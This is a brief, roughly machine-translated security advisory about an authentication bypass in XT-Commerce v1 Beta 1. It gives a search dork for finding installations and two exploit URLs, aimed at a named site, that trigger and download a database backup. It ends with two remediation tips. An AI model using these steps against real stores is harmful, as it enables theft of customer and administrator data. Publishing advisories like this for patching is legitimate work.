XT-Commerce v1 Beta 1 permission to bypass the Modify download backup vulnerability-vulnerability warning-the black bar safety net

2010-05-02T00:00:00
ID MYHACK58:62201026827
Type myhack58
Reporter 佚名
Modified 2010-05-02T00:00:00

Description

Premiere: the Red section of the network security Author: Amxking Submitted to: indoushka Vulnerability program: XT-Commerce v1 Beta 1 Affected version: v1 Beta 1 Risk level: medium Vulnerability description: Amxking:the vulnerability is I and the foreign Avengers team communication time obtained by indoushka published, I for the vulnerability to be translated, supplemented, re-edited release, this vulnerability is a obtain BACKUP DATABASE information. Translated supplied to the AKT members share, in principle, very simple, nothing special, a simple introduction to the following process: The exploit: the 1. By google search Powered by XT-Commerce, or using the set program target

  1. Backup: http://bbs.honkwin.com/XT-Commerce/admin/backup.php/login.php?action=backupnow

  2. Download backup: http://bbs.honkwin.com/XT-Commerce/admin/backup.php/login.php?action=download&file=db_comm-2 0 1 0 0 3 0 1 2 2 2 1 3 8. sql Description: If you use IE can't download, it is recommended that you use Mozilla Firefox10. 1 0 version download.

【Honkwin】Safety recommendations:

  1. Background privileges plus authentication.
  2. BACKUP DATABASE save path recommended setting in the web directory, and strictly control access